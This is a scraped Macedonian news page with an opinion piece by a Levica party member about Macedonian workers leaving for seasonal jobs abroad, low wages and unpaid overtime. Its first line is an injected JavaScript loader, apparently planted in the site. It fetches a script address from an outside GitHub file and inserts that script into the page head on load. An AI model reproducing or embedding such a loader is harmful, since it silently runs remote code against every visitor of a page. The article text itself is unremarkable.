;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Слезенковски: Македонскиот работник иднината ја гледа надвор од Македонија - Антропол
АктуелноЛокалноСтав

Слезенковски: Македонскиот работник иднината ја гледа надвор од Македонија

  • Пишува: Слезенковски Кирил – член на Централниот комитет при политичката партија Левица

Последните години во Македонија се појавуваат сé повеќе агенциите за посредување за сезонска работа низ европските земји. Покрај понуда за сезонска работа во Германија, каде најголем број на наши граѓани одлучуваат да заминат, се зголемува и побарувачката на работна сила во Хрватска и Словенија. 

Земјите од регионот, како Словенија и Хрватска, во последните неколку години најчесто бараат сезонски работници во делот на: угостителство, продажба, логистика и занаетчиство. Голем број од овие сезонски работници одлучуваат и да го продолжат својот работен престој и по истекот на работниот договор бидејќи општите услови за работа се разликуваат од оние кај нас.

Токму делот на: угостителството, продажбата, логистиката и занаетчиството се најмалку платените работни позиции во Македонија. Кадарот кој што се занимава со ваков тип на дејност најчесто се соочува со проблеми на работното место каде што не се запазуваат работничките права на вработениот. Плата на рака, ненавремено исплаќање на плата, без право на породилното отсуство, неплатено прекувремено работно време се добропознатите проблеми со кои се соочуваат македонските работници. Владата иако добро ги познава овие проблеми нема решение.

Порастот на економијата за 2024/25 година ќе биде на минимално ниво, а тоа значи дека состојбата нема да се подобри. Немањето на конкретни мерки за раст и развој на економијата само ќе допринесе за зголемување на број на работоспособно население исселено од Македонија. Со погазени работнички права и недоволни економски мерки кои би го кренале стандардот на македонската економија, граѓаните бараат алтернатива. А, алтернативата е далеку од сопствената земја.